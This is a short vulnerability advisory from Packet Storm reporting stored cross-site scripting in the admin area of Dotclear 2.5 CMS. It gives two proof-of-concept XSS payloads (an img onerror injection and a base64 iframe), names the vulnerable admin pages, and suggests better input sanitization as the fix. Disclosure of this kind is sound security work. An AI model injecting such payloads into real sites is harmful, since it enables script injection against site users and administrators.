Dotclear version 2.5 suffers from a cross site scripting vulnerability.
e963b235c2473ba1856c41c979ed4bdb77a01b126752a9d002ff7ec49969440aExploit Title: Dotclear 2.5 Cms Cross Site Scripting Vulnerabilities
# Date: 06/04/2013
# Author: Nikhalesh Singh Bhadoria
# Twitter: @nikhaleshsingh
#Download Link:http://dotclear.org/
# Versions Affected: Dotclear 2.5.
# Category:Xss
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Vulnerabilitie Description:
The Vulnerabilities in admin area users options and many other place input in is not sanitized. Therefore it results
in a stored cross-site scripting
Dotclear Description:
DotClear was design only for weblogs management, and do it well. It is completely free! DotClear is a free software distributed under the GNU General Public License..
POC:
http://www.youtube.com/watch?v=3eiEC8MtrpM&feature=youtu.be
Code :-
########################################################################################################
"><img src=x onerror=prompt(0);>
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
http://demo.xxx.com/admin/preferences.php
http://demo.xxx.com/dotclear/admin/users.php
##########################################################################################################
Fix:
Better sanitization by restricting special characters.
Regard's
Nikhalesh Singh Bhadoria
Information Security Enthusiast
Website:Gurunsb.com
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed